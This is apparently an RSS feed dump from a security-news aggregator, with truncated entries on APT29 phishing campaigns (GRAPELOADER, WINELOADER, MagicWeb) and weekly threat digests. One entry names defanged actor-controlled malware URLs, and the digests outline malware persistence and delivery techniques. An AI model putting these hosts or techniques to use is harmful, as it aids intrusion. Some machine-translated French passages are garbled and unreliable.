This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2025-05-10T18:46:44+00:00 www.secnews.physaphae.fr eSecurityPlanet - Blog Un groupe de piratage lié à l'État russe accélère ses cyberattaques contre des cibles diplomatiques à travers l'Europe, en utilisant un nouvel outil de logiciel malveillant furtif connu sous le nom de «grapeloader» pour fournir des charges utiles malveillantes par des e-mails de phishing intelligemment déguisés. Selon Check Point Research, la campagne a commencé en janvier 2025 et est réalisée par APT29 - également connue sous le nom de […]

---

>A Russian state-linked hacking group is ramping up its cyberattacks against diplomatic targets across Europe, using a new stealthy malware tool known as “GrapeLoader” to deliver malicious payloads through cleverly disguised phishing emails. According to Check Point Research, the campaign began in January 2025 and is being carried out by APT29 - also known as […] ]]> 2025-04-21T08:11:18+00:00 https://www.esecurityplanet.com/cybersecurity/russian-hackers-wine-tasting-phishing/ www.secnews.physaphae.fr/article.php?IdArticle=8665580 False Malware,Tool APT 29 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The Russian state-sponsored threat actor known as APT29 has been linked to an advanced phishing campaign that\'s targeting diplomatic entities across Europe with a new variant of WINELOADER and a previously unreported malware loader codenamed GRAPELOADER. "While the improved WINELOADER variant is still a modular backdoor used in later stages, GRAPELOADER is a newly observed initial-stage tool]]> 2025-04-20T10:28:00+00:00 https://thehackernews.com/2025/04/apt29-deploys-grapeloader-malware.html www.secnews.physaphae.fr/article.php?IdArticle=8665148 False Malware,Tool,Threat APT 29 2.0000000000000000 HackRead - Chercher Cyber Midnight Blizzard (APT29/Cozy Bear) targets European embassies and Ministries of Foreign Affairs with sophisticated phishing emails disguised as…]]> 2025-04-19T18:13:05+00:00 https://hackread.com/cozy-bear-wine-lure-wineloader-malware-eu-diplomats/ www.secnews.physaphae.fr/article.php?IdArticle=8664982 False Malware APT 29 3.0000000000000000 The Register - Site journalistique Anglais Vintage phishing varietal has improved with age Russia never stops using proven tactics, and its Cozy Bear, aka APT 29, cyber-spies are once again trying to lure European diplomats into downloading malware with a phony invitation to a lux event.…]]> 2025-04-16T12:29:09+00:00 https://go.theregister.com/feed/www.theregister.com/2025/04/16/cozy_bear_grapeloader/ www.secnews.physaphae.fr/article.php?IdArticle=8663526 False Malware APT 29 3.0000000000000000 Checkpoint - Fabricant Materiel Securite La recherche sur le point de contrôle des exécutions exécutive a observé une campagne de phishing sophistiquée menée par Advanced Persistance Menace (APT) 29, un groupe de menaces lié à la Russie. L'opération a ciblé les organisations diplomatiques à travers l'Europe. La campagne semble poursuivre une opération précédente appelée Wineloader, qui imite un grand ministère européen des Affaires étrangères pour distribuer de fausses invitations aux événements diplomatiques, le plus souvent des événements de dégustation du vin. La campagne, qui a été répandue par e-mails de phishing, a utilisé un nouveau logiciel malveillant surnommé Grapeloader. Une nouvelle variante de Wineloader a également été découverte, probablement utilisée à un stade ultérieur de la campagne. INTRODUCTION CHECK Point Research (RCR) a identifié une vague significative de […]

---

>Executive Summary Check Point Research has been observing a sophisticated phishing campaign conducted by Advanced Persistent Threat (APT) 29, a Russian-linked threat group. The operation targeted diplomatic organizations throughout Europe. The campaign appears to continue a previous operation called Wineloader, which impersonates a major European foreign affairs ministry to distribute fake invitations to diplomatic events, most commonly wine-tasting events. The campaign, which was spread via phishing emails, used a new malware dubbed Grapeloader. A new variant of Wineloader was also discovered, likely used in a later stage of the campaign. Introduction Check Point Research (CPR) identified a significant wave of […] ]]> 2025-04-15T13:00:52+00:00 https://blog.checkpoint.com/research/unmasking-apt29-the-sophisticated-phishing-campaign-targeting-european-diplomacy/ www.secnews.physaphae.fr/article.php?IdArticle=8663105 False Malware,Threat APT 29 3.0000000000000000 Mandiant - Blog Sécu de Mandiant 2025-02-11T20:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/cybercrime-multifaceted-national-security-threat/ www.secnews.physaphae.fr/article.php?IdArticle=8648141 False Ransomware,Malware,Tool,Vulnerability,Threat,Legislation,Medical,Cloud,Technical APT 41,APT 38,APT 29,APT 43,APT 44 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-28T22:05:17+00:00 https://community.riskiq.com/article/f1657bc5 www.secnews.physaphae.fr/article.php?IdArticle=8603028 True Ransomware,Malware,Tool,Threat,Cloud APT 29 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-14T21:26:20+00:00 https://community.riskiq.com/article/cd213500 www.secnews.physaphae.fr/article.php?IdArticle=8597846 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching,Industrial,Medical,Cloud APT 29,APT 10,GoldenJackal 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-11T00:28:23+00:00 https://community.riskiq.com/article/2c8cb717 www.secnews.physaphae.fr/article.php?IdArticle=8595736 False Malware,Tool,Vulnerability,Threat,Cloud,Technical APT 29 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-09-09T11:04:46+00:00 https://community.riskiq.com/article/563312a4 www.secnews.physaphae.fr/article.php?IdArticle=8573205 False Ransomware,Malware,Tool,Vulnerability,Threat,Prediction,Medical,Commercial APT 38,APT 29 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-09-04T02:45:48+00:00 https://community.riskiq.com/article/12b5ac31 www.secnews.physaphae.fr/article.php?IdArticle=8569431 False Malware,Tool,Vulnerability,Threat,Legislation,Mobile,Commercial APT 29 2.0000000000000000 ProofPoint - Cyber Firms 2024-07-16T07:26:11+00:00 https://www.proofpoint.com/us/blog/cloud-security/threat-actors-arsenal-how-hackers-target-cloud-accounts www.secnews.physaphae.fr/article.php?IdArticle=8538226 False Spam,Malware,Tool,Threat,Prediction,Cloud,Technical APT 29 3.0000000000000000 Mandiant - Blog Sécu de Mandiant   As North Atlantic Treaty Organization (NATO) members and partners gather for a historic summit, it is important to take stock of one of its most pressing challenges-the cyber threat. The Alliance faces a barrage of malicious cyber activity from all over the globe, carried out by emboldened state-sponsored actors, hacktivists, and criminals who are willing to cross lines and carry out activity that was previously considered unlikely or inconceivable. In addition to military targets, NATO must consider the risks that hybrid threats like malicious cyber activity pose to hospitals, civil society, and other targets, which could impact resilience in a contingency. The war in Ukraine is undoubtedly linked to escalating cyber threat activity, but many of these threats will continue to grow separately and in parallel.  NATO must contend with covert, aggressive malicious cyber actors that are seeking to gather intelligence, preparing to or currently attacking critical infrastructure, and working to undermine the Alliance with elaborate disinformation schemes. In order to protect its customers and clients, Google is closely tracking cyber threats, including those highlighted in this report; however, this is just a glimpse at a much larger and evolving landscape. Cyber Espionage NATO\'s adversaries have long sought to leverage cyber espionage to develop insight into the political, diplomatic, and military disposition of the Alliance and to steal its defense technologies and economic secrets. However, intelligence on the Alliance in the coming months will be of heightened importance. This year\'s summit is a transition period, with the appointment of Mark Rutte as the new Secretary General and a number of adaptations expected to be rolled out to shore up the Alliance\'s defense posture and its long-term support for Ukraine. Successful cyber espionage from threat actors could potentially undermine the Alliance\'s strategic advantage and inform adversary leadership on how to anticipate and counteract NATO\'s initiatives and investments. NATO is targeted by cyber espionage activity from actors around the world with varying capabilities. Many still rely on technically simple but operationally effective methods, like social engineering. Others have evolved and elevated their tradecraft to levels that distinguish themselves as formidable adversaries for even the most experienced defenders. APT29 (ICECAP) Publicly attributed to the Russian Foreign Intelligence Services (SVR) by several governments, APT29 is heavily focused on diplomatic and political intelligence collection, principally targeting Europe and NATO member states. APT29 has been involved in multiple high-profile breaches of technology firms that were designed to provide access to the public sector. In the past year, Mandiant has observed APT29 targeting technology companies and IT service providers in NATO member countries to facilitate third-party and software supply chain compromises of government and poli]]> 2024-07-08T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-facing-nato/ www.secnews.physaphae.fr/article.php?IdArticle=8532698 False Ransomware,Malware,Tool,Vulnerability,Threat,Legislation,Medical,Cloud,Technical APT 29,APT 28 3.0000000000000000 Mandiant - Blog Sécu de Mandiant   Executive Summary The election cybersecurity landscape globally is characterized by a diversity of targets, tactics, and threats. Elections attract threat activity from a variety of threat actors including: state-sponsored actors, cyber criminals, hacktivists, insiders, and information operations as-a-service entities. Mandiant assesses with high confidence that state-sponsored actors pose the most serious cybersecurity risk to elections. Operations targeting election-related infrastructure can combine cyber intrusion activity, disruptive and destructive capabilities, and information operations, which include elements of public-facing advertisement and amplification of threat activity claims. Successful targeting does not automatically translate to high impact. Many threat actors have struggled to influence or achieve significant effects, despite their best efforts.  When we look across the globe we find that the attack surface of an election involves a wide variety of entities beyond voting machines and voter registries. In fact, our observations of past cycles indicate that cyber operations target the major players involved in campaigning, political parties, news and social media more frequently than actual election infrastructure.   Securing elections requires a comprehensive understanding of many types of threats and tactics, from distributed denial of service (DDoS) to data theft to deepfakes, that are likely to impact elections in 2024. It is vital to understand the variety of relevant threat vectors and how they relate, and to ensure mitigation strategies are in place to address the full scope of potential activity.  Election organizations should consider steps to harden infrastructure against common attacks, and utilize account security tools such as Google\'s Advanced Protection Program to protect high-risk accounts. Introduction  The 2024 global election cybersecurity landscape is characterized by a diversity of targets, tactics, and threats. An expansive ecosystem of systems, administrators, campaign infrastructure, and public communications venues must be secured against a diverse array of operators and methods. Any election cybersecurity strategy should begin with a survey of the threat landscape to build a more proactive and tailored security posture.  The cybersecurity community must keep pace as more than two billion voters are expected to head to the polls in 2024. With elections in more than an estimated 50 countries, there is an opportunity to dynamically track how threats to democracy evolve. Understanding how threats are targeting one country will enable us to better anticipate and prepare for upcoming elections globally. At the same time, we must also appreciate the unique context of different countries. Election threats to South Africa, India, and the United States will inevitably differ in some regard. In either case, there is an opportunity for us to prepare with the advantage of intelligence.  ]]> 2024-04-25T10:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-global-elections/ www.secnews.physaphae.fr/article.php?IdArticle=8500393 False Ransomware,Malware,Hack,Tool,Vulnerability,Threat,Legislation,Cloud,Technical APT 40,APT 29,APT 28,APT 43,APT 31,APT 42 3.0000000000000000 ProofPoint - Cyber Firms 2024-04-12T06:00:03+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/defeating-malicious-application-creation-attacks www.secnews.physaphae.fr/article.php?IdArticle=8480713 False Spam,Malware,Tool,Threat,Cloud APT 29 3.0000000000000000 ProofPoint - Cyber Firms 2024-04-11T13:27:54+00:00 https://www.proofpoint.com/us/blog/cloud-security/revisiting-mact-malicious-applications-credible-cloud-tenants www.secnews.physaphae.fr/article.php?IdArticle=8480061 False Malware,Threat,Prediction,Cloud APT 29 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The WINELOADER backdoor used in recent cyber attacks targeting diplomatic entities with wine-tasting phishing lures has been attributed as the handiwork of a hacking group with links to Russia\'s Foreign Intelligence Service (SVR), which was responsible for breaching SolarWinds and Microsoft. The findings come from Mandiant, which said Midnight Blizzard (aka APT29, BlueBravo, or]]> 2024-03-23T11:33:00+00:00 https://thehackernews.com/2024/03/russian-hackers-use-wineloader-malware.html www.secnews.physaphae.fr/article.php?IdArticle=8468914 False Malware APT 29 2.0000000000000000 Mandiant - Blog Sécu de Mandiant   Executive Summary In late February, APT29 used a new backdoor variant publicly tracked as WINELOADER to target German political parties with a CDU-themed lure.   This is the first time we have seen this APT29 cluster target political parties, indicating a possible area of emerging operational focus beyond the typical targeting of diplomatic missions. Based on the SVR\'s responsibility to collect political intelligence and this APT29 cluster\'s historical targeting patterns, we judge this activity to present a broad threat to European and other Western political parties from across the political spectrum. Please see the Technical Annex for technical details and MITRE ATT&CK techniques, (T1543.003, T1012, T1082, T1134, T1057, T1007, T1027, T1070.004, T1055.003 and T1083) Threat Detail In late February 2024, Mandiant identified APT29 - a Russian Federation backed threat group linked by multiple governments to Russia\'s Foreign Intelligence Service (SVR) - conducting a phishing campaign targeting German political parties. Consistent with APT29 operations extending back to 2021, this operation leveraged APT29\'s mainstay first-stage payload ROOTSAW (aka EnvyScout) to deliver a new backdoor variant publicly tracked as WINELOADER.  Notably, this activity represents a departure from this APT29 initial access cluster\'s typical remit of targeting governments, foreign embassies, and other diplomatic missions, and is the first time Mandiant has seen an operational interest in political parties from this APT29 subcluster. Additionally, while APT29 has previously used lure documents bearing the logo of German government organizations, this is the first instance where we have seen the group use German-language lure content - a possible artifact of the targeting differences (i.e. domestic vs. foreign) between the two operations.  Phishing emails were sent to victims purporting to be an invite to a dinner reception on 01 March bearing a logo from the Christian Democratic Union (CDU), a major political party in Germany (see Figure 1).  The German-language lure document contains a phishing link directing victims to a malicious ZIP file containing a ROOTSAW dropper hosted on an actor-controlled compromised website “https://waterforvoiceless[.]org/invite.php”.  ROOTSAW delivered a second-stage CDU-themed lure document and a next stage WINELOADER payload retrieved from “waterforvoiceless[.]org/util.php”.  WINELOADER was first observed in operational use in late January 2024 in an operation targeting likely diplomatic entities in Czechia, Germany, India, Italy, Latvia, and Peru.  The backdoor contains several features and functions that overlap with several known APT29 malware families including BURNTBATTER, MUSKYBEAT and BEATDROP, indicating they are likely created by a common developer (see Technical Annex for additional details). ]]> 2024-03-22T00:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/apt29-wineloader-german-political-parties/ www.secnews.physaphae.fr/article.php?IdArticle=8500402 False Malware,Threat,Cloud,Technical APT 29 3.0000000000000000 Fortinet - Fabricant Materiel Securite FortiGuardLabs discovered a new APT29 campaign which includes TeamCity exploitation and GraphicalProton malware. Learn more.]]> 2023-12-13T15:00:00+00:00 https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793 www.secnews.physaphae.fr/article.php?IdArticle=8422188 False Malware APT 29 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) An ongoing campaign targeting ministries of foreign affairs of NATO-aligned countries points to the involvement of Russian threat actors. The phishing attacks feature PDF documents with diplomatic lures, some of which are disguised as coming from Germany, to deliver a variant of a malware called Duke, which has been attributed to APT29 (aka BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock,]]> 2023-08-17T15:09:00+00:00 https://thehackernews.com/2023/08/russian-hackers-use-zulip-chat-app-for.html www.secnews.physaphae.fr/article.php?IdArticle=8371161 False Malware,Threat APT 29 2.0000000000000000 Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces banquier QBOT livré par correspondance commerciale (Publié: 17 avril 2023) Début avril 2023, un volume accru de Malspam en utilisant le détournement de fil commercial-imail a été détecté pour fournir le troin bancaire QBOT (QAKBOT, Quackbot, Pinkslipbot).Les leurres observés en anglais, en allemand, en italien et en français visaient divers pays, les trois premiers étant l'Allemagne, l'Argentine et l'Italie, dans cet ordre.Les attaquants usurpaient un nom dans la conversation détournée pour inciter la cible à ouvrir un fichier PDF ci-joint.La cible est ensuite confrontée à un bouton, à un mot de passe et à une instruction pour télécharger, déballer et exécuter un fichier de script Windows malveillant (WSF) dans une archive protégée par mot de passe.L'exécution des utilisateurs est suivie d'une désobfuscation automatisée d'un JScript contenu produisant un script PowerShell codé visant à télécharger une DLL QBOT à partir d'un site Web compromis et à l'exécuter à l'aide de RunDLL32.QBOT vole les informations d'identification, profil les systèmes pour identifier les perspectives de ciblage supplémentaire de grande valeur et vole des e-mails stockés localement pour une prolifération supplémentaire via le détournement de fil calspam. Commentaire de l'analyste: L'usurpation du nom de l'expéditeur des lettres précédentes du & lsquo; from & rsquo;Le champ peut être identifié dans cette campagne car il utilise une adresse e-mail frauduleuse de l'expéditeur différent de celle du véritable correspondant.Les utilisateurs doivent être prudents avec des archives protégées par mot de passe et des types de fichiers suspects tels que WSF.Les indicateurs de réseau et d'hôtes associés à cette campagne QBOT sont disponibles dans la plate-forme Anomali et il est conseillé aux clients de les bloquer sur leur infrastructure. mitreAtt & amp; ck: [mitre att & amp; ck] t1566 - phishing | [mitre att & amp; ck] t1204 - exécution des utilisateurs | [mitre att & amp; ck] t1207 - contrôleur de domaine voyou | [mitre att & amp; ck] t1140 - déobfuscate /Décoder des fichiers ou des informations | [mitre att & amp; ck] t1059.001: powershell | [mitre att & amp; ck] t1218.011 - Exécution par proxy binaire signée: rundll32 | [mitre att & amp; ck] t1090 - proxy | [mitre att & amp; ck] t1114.001 - collection de courriels: collection de message]]> 2023-04-18T17:14:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-cozy-bear-employs-new-downloaders-rtm-locker-ransomware-seeks-privacy-vice-society-automated-selective-exfiltration www.secnews.physaphae.fr/article.php?IdArticle=8328981 False Ransomware,Malware,Tool,Threat APT 29,APT 29 2.0000000000000000 SecurityWeek - Security News Russia-linked cyberespionage group APT29 has been observed using embassy-themed lures and the GraphicalNeutrino malware in recent attacks. ]]> 2023-01-30T12:03:49+00:00 https://www.securityweek.com/russia-linked-apt29-uses-new-malware-in-embassy-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8305560 False Malware APT 29 2.0000000000000000 Security Affairs - Blog Secu Russia-linked APT group Nobelium is behind a new sophisticated post-exploitation malware tracked by Microsoft as MagicWeb. Microsoft security researchers discovered a post-compromise malware, tracked as MagicWeb, which is used by the Russia-linked NOBELIUM APT group to maintain persistent access to compromised environments.  The NOBELIUM APT (APT29, Cozy Bear, and The Dukes) is the threat actor that […] ]]> 2022-08-25T17:11:38+00:00 https://securityaffairs.co/wordpress/134838/apt/nobelium-magicweb-tool.html www.secnews.physaphae.fr/article.php?IdArticle=6524118 False Malware,Threat APT 29 None Bleeping Computer - Magazine Américain 2022-08-25T12:36:49+00:00 https://www.bleepingcomputer.com/news/security/microsoft-russian-malware-hijacks-adfs-to-log-in-as-anyone-in-windows/ www.secnews.physaphae.fr/article.php?IdArticle=6523204 False Malware APT 29 3.0000000000000000 SecurityWeek - Security News 2022-08-25T10:16:06+00:00 https://www.securityweek.com/microsoft-details-new-post-compromise-malware-used-russian-cyberspies www.secnews.physaphae.fr/article.php?IdArticle=6518394 False Malware,Tool APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Lightning Framework: New Undetected “Swiss Army Knife” Linux Malware (published: July 21, 2022) Intezer researchers discovered a new Linux malware called Lightning Framework (Lightning). It is a modular framework able to install multiple types of rootkits and to run various plugins. Lightning has passive and active capabilities for communication with the threat actor, including opening up SSH service via an OpenSSH daemon, and a polymorphic command and control (C2) configuration. Lightning is a newly discovered threat, and there is no information about its use in the wild and the actors behind it. Analyst Comment: Defenders should block known Lightning indicators. Monitor for file creation based on the Lightning naming convention. MITRE ATT&CK: [MITRE ATT&CK] Logon Scripts - T1037 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Hide Artifacts - T1564 | [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Rootkit - T1014 | [MITRE ATT&CK] Indicator Removal on Host - T1070 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Network Service Scanning - T1046 | [MITRE ATT&CK] Network Sniffing - T1040 | [MITRE ATT&CK] System Information Discovery - T1082 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Standard Non-Application Layer Protocol - T1095 | [MITRE ATT&CK] Proxy - T1090 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 Tags: Lightning Framework, Linux, Lightning.Downloader, Lightning.Core, Typosquatting, Masquerading, Timestomping, Port:33229 Google Ads Lead to Major Malvertising Campaign (published: July 20, 2022) Malwarebytes researchers discovered a malvertising campaign abusing Google Search advertisements for popular keywords such as “amazon,” “fac]]> 2022-07-26T17:10:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-cozy-bear-abuses-google-drive-api-complex-lightning-framework-targets-linux-google-ads-hide-fraudulent-redirects-and-more www.secnews.physaphae.fr/article.php?IdArticle=5953922 False Malware,Tool,Threat,Guideline APT 29 None IT Security Guru - Blog Sécurité 2022-07-21T10:13:51+00:00 https://www.itsecurityguru.org/2022/07/21/russian-adversaries-target-google-drive-and-dropbox-in-latest-campaign/?utm_source=rss&utm_medium=rss&utm_campaign=russian-adversaries-target-google-drive-and-dropbox-in-latest-campaign www.secnews.physaphae.fr/article.php?IdArticle=5853101 False Malware,Threat APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Targets of Interest | Russian Organizations Increasingly Under Attack By Chinese APTs (published: July 7, 2022) SentinelLabs researchers detected yet another China-sponsored threat group targeting Russia with a cyberespionage campaign. The attacks start with a spearphishing email containing Microsoft Office maldocs built with the Royal Road malicious document builder. These maldocs were dropping the Bisonal backdoor remote access trojan (RAT). Besides targeted Russian organizations, the same attackers continue targeting other countries such as Pakistan. This China-sponsored activity is attributed with medium confidence to Tonto Team (CactusPete, Earth Akhlut). Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from advanced persistent threats (APTs), including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 Tags: China, source-country:CN, Russia, target-country:RU, Ukraine, Pakistan, target-country:PK, Bisonal RAT, Tonto Team, APT, CactusPete, Earth Akhlut, Royal Road, 8.t builder, CVE-2018-0798 OrBit: New Undetected Linux Threat Uses Unique Hijack of Execution Flow (published: July 6, 2022) Intezer researchers describe a new Linux malware dubbed OrBit, that was fully undetected at the time of the discovery. This malware hooks functions and adds itself to all running processes, but it doesn’t use LD_PRELOAD as previously described Linux threats. Instead it achieves persistence by adding the path to the malware into the /etc/ld.so.preload and by patching the binary of the loader itself so it will load the malicious shared object. OrBit establishes an SSH connection, then stages and infiltrates stolen credentials. It avoids detection by multiple functions that show running processes or network connections, as it hooks these functions and filters their output. Analyst Comment: Defenders are advised to use network telemetry to detect anomalous SSH traffic associated with OrBit exfiltration attempts. Consider network segmentation, storing sensitive data offline, and deploying security solutions as statically linked executables. MITRE ATT&CK: [MITRE ATT&CK] Hijack Execution Flow - T1574 | [MITRE ATT&CK] Hide Artifacts - T1564 | ]]> 2022-07-11T22:59:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-brute-ratel-c4-framework-abused-to-avoid-detection-orbit-kernel-malware-patches-linux-loader-hive-ransomware-gets-rewritten-and-more www.secnews.physaphae.fr/article.php?IdArticle=5664956 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching APT 29 None The Register - Site journalistique Anglais 2022-07-06T05:27:10+00:00 https://go.theregister.com/feed/www.theregister.com/2022/07/06/brc4_state_sponsored_apt29/ www.secnews.physaphae.fr/article.php?IdArticle=5573916 False Malware,Tool,Threat APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Attackers Are Attempting to Exploit Critical F5 BIG-IP RCE (published: May 9, 2022) CVE-2022-1388, a critical remote code execution vulnerability affecting F5 BIG-IP multi-purpose networking devices/modules, was made public on May 4, 2022. It is of high severity (CVSSv3 score is 9.8). By May 6, 2022, multiple researchers have developed proof-of concept (PoC) exploits for CVE-2022-1388. The first in-the-wild exploitation attempts were reported on May 8, 2022. Analyst Comment: Update your vulnerable F5 BIG-IP versions 13.x and higher. BIG-IP 11.x and 12.x will not be fixed, but temporary mitigations available: block iControl REST access through the self IP address and through the management interface, modify the BIG-IP httpd configuration. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 Tags: CVE-2022-1388, F5, Vulnerability, Remote code execution, Missing authentication Mobile Subscription Trojans and Their Little Tricks (published: May 6, 2022) Kaspersky researchers analyzed five Android trojans that are secretly subscribing users to paid services. Jocker trojan operators add malicious code to legitimate apps and re-upload them to Google Store under different names. To avoid detection, malicious functionality won’t start until the trojan checks that it is available in the store. The malicious payload is split in up to four files. It can block or substitute anti-fraud scripts, and modify X-Requested-With header in an HTTP request. Another Android malware involved in subscription fraud, MobOk trojan, has additional functionality to bypass captcha. MobOk was seen in a malicious app in Google Store, but the most common infection vector is being spread by other Trojans such as Triada. Analyst Comment: Limit your apps to downloads from the official stores (Google Store for Android), avoid new apps with low number of downloads and bad reviews. Pay attention to the terms of use and payment. Avoid granting it too many permissions if those are not crucial to the app alleged function. Monitor your balance and subscription list. MITRE ATT&CK: [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Data Manipulation - T1565 Tags: Android, Jocker, MobOk, Triada, Vesub, GriftHorse, Trojan, Subscription fraud, Subscription Trojan, Russia, target-country:RU, Middle East, Saudi Arabia, target-country:SA, Egypt, target-country:EG, Thailand, target-country:TH Raspberry Robin Gets the Worm Early (published: May 5, 2022) Since September 2021, Red Canary researchers monitor Raspberry Robin, a new worm]]> 2022-05-10T17:08:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-moshen-dragon-abused-anti-virus-software-raspberry-robin-worm-jumps-from-usb-unc3524-uses-internet-of-things-to-steal-emails-and-more www.secnews.physaphae.fr/article.php?IdArticle=4573852 False Ransomware,Malware,Tool,Vulnerability,Threat APT 29,APT 28 3.0000000000000000 SecurityWeek - Security News 2022-05-03T10:08:45+00:00 https://www.securityweek.com/russian-cyberspies-target-diplomats-new-malware www.secnews.physaphae.fr/article.php?IdArticle=4537052 False Malware APT 29 None Mandiant - Blog Sécu de Mandiant Parrainé par le Foreign Intelligence Service (SVR).Le ciblage diplomatique centré sur ce récent

---

Since early 2021, Mandiant has been tracking extensive APT29 phishing campaigns targeting diplomatic organizations in Europe, the Americas, and Asia. This blog post discusses our recent observations related to the identification of two new malware families in 2022, BEATDROP and BOOMMIC, as well as APT29\'s efforts to evade detection through retooling and abuse of Atlassian\'s Trello service. APT29 is a Russian espionage group that Mandiant has been tracking since at least 2014 and is likely sponsored by the Foreign Intelligence Service (SVR). The diplomatic-centric targeting of this recent]]> 2022-04-28T12:00:00+00:00 https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns www.secnews.physaphae.fr/article.php?IdArticle=8377468 False Malware APT 29,APT 29 4.0000000000000000 Fortinet ThreatSignal - Harware Vendor 2022-03-15T13:20:59+00:00 https://fortiguard.fortinet.com/threat-signal-report/4450 www.secnews.physaphae.fr/article.php?IdArticle=4287368 True Malware,Threat APT 29 None Fortinet ThreatSignal - Harware Vendor 2022-02-23T18:34:00+00:00 https://fortiguard.fortinet.com/threat-signal-report/4425 www.secnews.physaphae.fr/article.php?IdArticle=4175593 False Malware,Threat APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New CapraRAT Android Malware Targets Indian Government and Military Personnel (published: February 7, 2022) Trend Micro researchers have discovered a new remote access trojan (RAT) dubbed, CapraRAT, that targets Android systems. CapraRAT is attributed to the advanced persistent threat (APT) group, APT36 (Earth Karkaddan, Mythic Leopard, Transparent Tribe), which is believed to be Pakistan-based group that has been active since at least 2016. The Android-targeting CapraRAT shares similarities (capabilities, commands, and function names) to the Windows targeting Crimson RAT, and researchers note that it may be a modified version of the open source AndroRAT. The delivery method of CapraRAT is unknown, however, APT36 is known to use spearphishing emails with attachments or links. Once CapraRAT is installed and executed it will attempt to reach out to a command and control server and subsequently begin stealing various data from an infected device. Analyst Comment: It is important to only use the Google Play Store to obtain your software (for Android users), and avoid installing software from unverified sources because it is easier for malicious applications to get into third-party stores. Applications that ask for additional permissions outside of their normal functionality should be treated with suspicion, and normal functionality for the applications should be reviewed carefully prior to installation. Antivirus applications, if available, should be installed devices. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Software Deployment Tools - T1072 Tags: APT36, Earth Karkaddan, Mythic Leopard, Transparent Tribe, Android, CapraRAT Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (published: February 3, 2022) The Russia-sponsored, cyberespionage group Primitive Bear (Gamaredon) has continued updating its toolset, according to Unit 42 researchers. The group continues to use their primary tactic in spearphishing emails with attachments that leverage remote templates and template injection with a focus on Ukraine. These email attachments are usually Microsoft Word documents that use the remote template to fetch VBScript, execute it to establish persistence, and wait for the group’s instruction via a command and control server. Unit 42 researchers have analyzed the group’s activity and infrastructure dating back to 2018 up to the current border tensions between Russia and Ukraine. The infrastructure behind the campaigns is robust, with clusters of domains that are rotated and parked on different IPs, often on a daily basis. Analyst Comment: Spearphishing emails represent a significant security risk because the sending email will often appear legitimate to the target; sometimes a target company email is compromis]]> 2022-02-08T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-conti-ransomware-attack-iran-sponsored-apts-new-android-rat-russia-sponsored-gamaredon-and-more www.secnews.physaphae.fr/article.php?IdArticle=4094313 False Ransomware,Malware,Threat,Conference APT 35,APT 35,APT 29,APT 29,APT 36 2.0000000000000000 Bleeping Computer - Magazine Américain 2022-01-27T09:23:25+00:00 https://www.bleepingcomputer.com/news/security/russian-apt29-hackers-stealthy-malware-undetected-for-years/ www.secnews.physaphae.fr/article.php?IdArticle=4041393 False Malware APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Earth Lusca 